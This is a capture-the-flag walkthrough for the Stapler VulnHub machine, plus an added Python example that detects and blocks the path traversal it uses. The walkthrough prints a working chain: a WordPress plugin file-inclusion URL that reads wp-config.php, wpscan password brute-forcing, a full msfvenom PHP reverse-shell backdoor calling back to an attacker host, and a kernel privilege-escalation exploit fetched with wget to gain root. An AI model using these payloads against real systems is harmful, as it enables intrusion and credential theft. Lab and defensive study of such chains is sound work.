Hack the Stapler VM (CTF Challenge)

https://www.vulnhub.com/entry/stapler-1,150/

http://www.hackingarticles.in/hack-stapler-vm-ctf-challenge/

  1. Start by scanning the target with sparta.
  2. On the HTTPS service on port 12380, robots.txt gives the first lead: https://192.168.1.103:12380/robots.txt
    User-agent: *
    Disallow: /admin112233/
    Disallow: /blogblog/
    
  3. Opening /blogblog/ shows the site is built on WordPress, so scan it with wpscan:
    • wpscan --url https://192.168.1.103:12380/blogblog/ --enumerate ap --enumerate at --enumerate u
      • --enumerate ap #all plugins (can take a long time)
      • --enumerate at #all themes (can take a long time)
      • --enumerate u #usernames from id 1 to 10
  4. The scan turns up two useful pieces of information:
  5. exploit-db lists "WordPress Plugin Advanced Video 1.0 - Local File Inclusion"
  6. Use the PoC to read the wp-config.php configuration file: https://192.168.1.103:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
  7. Opening https://192.168.1.103:12380/blogblog/?p=210 returns an error message, but https://192.168.1.103:12380/blogblog/ now shows a newly added post and a reference to 1480089714.jpeg
  8. Browsing https://192.168.1.103:12380/blogblog/wp-content/uploads/ reveals the extra file 1480089714.jpeg
  9. Downloading and reading it reveals plenty of information, including the MySQL credentials; use a MySQL client such as HeidiSQL_9.3_Portable to connect to the server
  10. Find the wp_users table, which holds the user accounts and their hashed passwords
  11. Use wpscan again to brute-force the first user account, john; the password turns out to be incorrect: wpscan --url https://192.168.1.103:12380/blogblog --wordlist /usr/share/wordlists/rockyou.txt --username john
  12. Generate a PHP backdoor with msfvenom: msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f raw; its content is as follows:
    <?php /**/ error_reporting(0); $ip = '192.168.1.102'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die(); ?>
    
  13. Log in with john's credentials and upload the PHP backdoor via Plugins
  14. Open msfconsole and enter:
    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set lhost 192.168.1.102
    set lport 4444
    run
    
  15. Open the PHP backdoor in the browser; the reverse shell is now established
  16. Enter shell, then enter:
    echo "import pty; pty.spawn('/bin/bash')" > /tmp/shell.py
    python /tmp/shell.py
    
  17. Running lsb_release -a reveals the operating system version:
    No LSB modules are available.
    Distributor ID:    Ubuntu
    Description:    Ubuntu 16.04 LTS
    Release:    16.04
    Codename:    xenial
    
  18. Search exploit-db for known vulnerabilities: "Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Privilege Escalation"
  19. Find writable directories on the system (I don't understand why a writable directory has to be found here, since shell.py was already created under /tmp earlier?): find / -writable -type d 2>/dev/null
  20. Download the exploit into /tmp: wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
  21. After unzipping, run the following commands to gain root and read the flag:
    cd ebpf_mapfd_doubleput_exploit
    ls (list the directories)
    ./compile.sh (will run the compile.sh)
    ./doubleput (will run the double.sh)
    whoami (will tell you where you have reached)
    cd /root (will take you into /root)
    ls (shows you the directories of /root)
    cat flag.txt
    
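The local file inclusion used in step 6 works because the plugin passes its thumb parameter into a file path without checking where it resolves. As an added example (not part of the original write-up or of the plugin's code), the Python below shows both sides of that issue from a defender's position: a server-side path check that keeps a user-supplied name inside the uploads directory, and a scan over constructed Apache-style access log lines that flags requests whose thumb value tries to escape it. The log lines, the base directory /srv/uploads and the function names are assumptions made for this example.

```python
import os
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access log (not taken from the target); lines 2 and 3
# carry traversal attempts, once plain and once URL-encoded.
SAMPLE_LOG = """\
192.168.1.102 - - [27/Nov/2016:10:00:01 +0000] "GET /blogblog/?p=1 HTTP/1.1" 200 5120
192.168.1.102 - - [27/Nov/2016:10:00:05 +0000] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php HTTP/1.1" 200 311
192.168.1.102 - - [27/Nov/2016:10:00:09 +0000] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=x&short=1&term=1&thumb=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 311
192.168.1.102 - - [27/Nov/2016:10:00:12 +0000] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=ok&short=1&term=1&thumb=cat.jpg HTTP/1.1" 200 311
"""

# Pulls the request target out of a common-log-format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def traversal_in_param(target, param="thumb"):
    """Return the decoded value of `param` if it tries to leave its directory, else None.

    parse_qs already decodes once; decoding a second time also catches
    double-encoded sequences such as %252e%252e%252f.
    """
    query = urlsplit(target).query
    for raw in parse_qs(query, keep_blank_values=True).get(param, []):
        decoded = unquote(raw).replace("\\", "/")
        if ".." in decoded.split("/") or decoded.startswith("/"):
            return decoded
    return None


def flag_traversal_requests(log_text, param="thumb"):
    """Scan access-log text; return (line_number, decoded_value) per suspicious request."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        bad = traversal_in_param(match.group("target"), param)
        if bad is not None:
            hits.append((number, bad))
    return hits


def resolve_within(base_dir, user_value):
    """Server-side fix: resolve the requested name under base_dir and refuse
    anything that escapes it.  Returns the absolute path, or None.

    os.path.join discards base_dir when user_value is absolute, and realpath
    collapses '..' and symlinks, so the commonpath test sees the real target.
    """
    if not user_value:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_value))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for number, value in flag_traversal_requests(SAMPLE_LOG):
        print(f"line {number}: traversal in thumb= {value!r}")
    for name in ("cat.jpg", "../wp-config.php"):
        print(f"{name!r} -> {resolve_within('/srv/uploads', name)}")
```

The detection side deliberately decodes twice and splits on the separator instead of searching for a bare `..` substring, so that a legitimate name such as `a..b.jpg` is not flagged while an encoded `../` is. The mitigation side compares real paths rather than rejecting strings, which also covers symlinks that point outside the uploads directory.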
